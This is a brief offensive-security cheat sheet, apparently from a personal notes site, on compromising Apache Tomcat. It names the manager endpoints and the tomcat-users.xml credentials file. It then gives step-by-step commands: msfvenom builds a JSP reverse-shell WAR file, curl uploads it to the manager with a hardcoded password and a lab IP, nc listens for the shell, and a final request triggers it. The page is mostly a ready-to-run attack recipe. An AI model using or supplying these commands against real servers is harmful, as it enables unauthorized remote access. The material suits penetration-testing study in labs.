Tomcat
Tomcat is like a secondary service usually runs on port 8080
Intresting Endpoints
/manager/html
/host-manager/html
Important Files
tomcat-users.xml # contains usernames and passwords
Exploitation
Create a malicious .war file deploy it and obtain reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war

Once deployed make a request to
http://targeturi:8080/shell
to obtain the reverse shell
NO-GUI
Whenever there is no GUI, the malicious war file can be still uploaded and deployed which will lead to obtaining a reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war
# curl --upload-file rev.war 'http://<username>:<password>@<host>:8080/manager/text/deploy?path=/<deploy path>'
curl --upload-file shell.war 'http://tomcat:$3cureP4s5w0rd123!@10.129.113.205:8080/manager/text/deploy?path=/dnoscp'
# listen for a reverse shell
nc -lvnp 1234
# make a request and obtain reverse shell
# curl -L --head http://<host>:8080/deployPath
curl -L --head http://10.129.113.205:8080/dnoscp
Last updated
Was this helpful?